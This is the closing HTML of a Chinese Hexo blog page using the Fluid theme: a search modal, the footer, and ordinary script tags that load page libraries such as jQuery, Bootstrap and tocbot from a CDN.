    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
